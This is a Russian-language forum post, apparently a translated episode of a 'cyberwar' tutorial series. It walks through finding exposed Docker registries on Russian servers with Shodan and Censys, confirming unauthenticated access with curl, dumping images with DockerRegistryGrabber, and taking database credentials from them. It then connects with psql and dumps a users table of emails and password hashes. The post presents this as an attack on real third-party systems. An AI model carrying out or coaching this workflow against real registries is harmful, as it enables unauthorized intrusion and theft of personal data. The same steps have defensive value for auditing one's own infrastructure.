Миссия кибервойны, часть 2: разведка на изображениях докеров противника

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие кибервоины!

В этом сериале Эйркоридор, наш человек на Украине, берёт вас с собой на реальные кибервойны против жестокой российской военной машины. Присоединяйтесь, наслаждайтесь и учитесь, наблюдая, как он использует свои начинающие навыки кибервойны, чтобы спасти свою страну от Путина и его дружков-клептократов!

6a4a49_4c5815dfe44747f8b4c7a13485872d71~mv2.jpg

Миссия​

Слушай, рядовой. Как говорит Мастер OTW, «только дурак идёт в бой без надлежащей разведки». Поэтому сегодня мы сосредоточим все усилия на эффективном сборе информации в реестре Amazon Elastic Container Registry (Amazon ECR).

6a4a49_e080957ff38e4700a359377c5b65257d~mv2.png

Amazon ECR — это полностью управляемый сервис реестра контейнеров Docker, который упрощает хранение, управление и развертывание образов контейнеров. ECR позволяет всем разработчикам сохранять конфигурации и быстро переносить их в производственную среду, тем самым снижая общую нагрузку. Рекомендуется проверять реестр, поскольку невнимательные разработчики могут оставлять конфиденциальную информацию.

Основные моменты работы ECR:

  1. ECR предоставляет управляемый реестр Docker в учетной записи AWS.
  2. Для организации образов контейнеров используются репозитории.
  3. Аутентификация осуществляется через AWS IAM.
  4. Изображения загружаются и извлекаются с помощью стандартных команд Docker после аутентификации.
  5. ECR предлагает дополнительные функции, такие как автоматическое сканирование изображений и политики жизненного цикла.
  6. Он тесно интегрируется с другими сервисами AWS, в частности ECS (Elastic Container Service) и EKS (Elastic Kubernetes Service).
URL-адрес для доступа к Amazon Elastic Container Registry (ECR) имеет следующий формат:

https://{account_id}.dkr.ecr.{region}.amazonaws.com/{repository_name}

Мы также можем найти российские серверы, работающие под управлением Docker Registry с использованием Shodan:

порт:5000 страна: «RU» продукт: «Docker Registry HTTP API» .

6a4a49_ec954e38407c46a8a4b431ddf286fb18~mv2.png

Это также можно сделать через Censys: ((Docker Registry) и services.port=`5000`) и location.country =`Russia`

6a4a49_063f9da71a0e4a5ca4e63bd24899072a~mv2.png

Чтобы убедиться, что это реестр Docker, мы можем запустить сканирование nmap:

6a4a49_7b36e694f4cd438994e08ca8809d8a59~mv2.png

Чтобы проверить, требует ли реестр авторизации, мы можем выполнить простую команду curl:

kali> curl -k http://<IP>:5000/v2/_catalog

6a4a49_6b441cf3e25846dfa5027fc9efed4625~mv2.png

Если авторизация не настроена, то мы можем получить список всех репозиториев:

6a4a49_a529ad3ab11245b683769ebf18681bab~mv2.png

Для анализа образа можно использовать DockerRegistryGrabber, чтобы получить дамп его содержимого. Вот как установить этот инструмент:

kali> git clone https://github.com/Syzik/DockerRegistryGrabber.git

kali> cd DockerRegistryGrabber

kali> python -m pip install -r requirements.txt


Вы можете получить список доступных изображений с помощью следующей команды:

kali> python drg.py http://<IP> –list

6a4a49_38532c5863ec4099a490086d8753d6a3~mv2.png

После этого вы можете сбросить одно из изображений или все сразу:

kali> python drg.py http://<IP> –dump <имя>

Чтобы извлечь все изображения, используйте флаг –dump_all .

6a4a49_4bff4de4d66841919a7424ec654c8eb9~mv2.png

Дампы вы можете найти в каталоге этого инструмента:

6a4a49_fe3e202a8c874890b01d58d897c3c3e3~mv2.png

Внутри вы увидите различные архивы, в которых может храниться важная информация:

6a4a49_ccdfe667d28543d28dfe96be2a296190~mv2.png

Например, таким образом был найден снимок одного из модулей приложения Java.

6a4a49_187da5b0b973403c868cff99eab8290d~mv2.png

Он содержал файл конфигурации с данными подключения к базе данных:

6a4a49_9f66831b5b324738bf9bfb1943746ac1~mv2.png

Для подключения я использовал следующую команду:

kali> psql -h <IP> -p <порт>-U <пользователь> -d <база данных>

6a4a49_7e91e488efcf48439273ad7865106ad8~mv2.png

Перечислены все таблицы: host: dt

6a4a49_6efe1b71a07144669646466ad20aeb16~mv2.png

Перечислены все данные из таблицы пользователей: host: SELECT * FROM users;

6a4a49_b6f5801ea51a4fe3b3f7de04201dacef~mv2.png

Идентификаторы, имена, адреса электронной почты и хэши паролей — все доступно.

Краткое содержание:

Хакерство — важнейший навык в XXI веке! Хакерские навыки, как и любые другие, можно использовать как во благо, так и во вред. Когда ваша страна подвергается нападению со стороны такого могущественного и жестокого диктатора, как Путин, может возникнуть необходимость использовать свои навыки для её спасения.

Продолжайте учиться и совершенствоваться. Docker постоянно набирает популярность, но безопасность не всегда является главным приоритетом для разработчиков. Поэтому это ещё одна важная технология в вашем арсенале.
 
Назад
Сверху Снизу